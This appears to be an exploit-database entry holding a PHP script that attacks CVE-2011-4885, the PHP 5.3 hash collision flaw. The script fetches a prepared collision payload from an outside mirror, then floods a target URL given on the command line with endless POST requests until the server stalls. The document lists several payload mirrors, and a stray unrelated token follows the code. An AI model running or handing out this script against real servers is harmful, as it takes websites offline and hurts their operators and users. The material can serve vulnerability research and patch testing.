# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit # Date: 1/1/12 # Author: infodox # Software Link: php.net # Version: 5.3.* # Tested on: Linux # CVE : CVE-2011-4885 Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt <?php /* PHP 5.3.* Hash Colission DoS Exploit by infodox Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt) http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt Changes: Different mirror for hashcollide.txt Now takes target as a command line argument Status message printing Twitter: @info_dox Blog: blog.infodox.co.cc Site: http://www.infodox.co.cc/ */ $targ = $argv[1]; $x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones... while(1) { echo "firing"; $ch = curl_init("$targ"); curl_setopt($ch, CURLOPT_POSTFIELDS, $x); curl_exec($ch); curl_close($ch); echo "[+] Voly Sent!"; } ?>
体验盒子
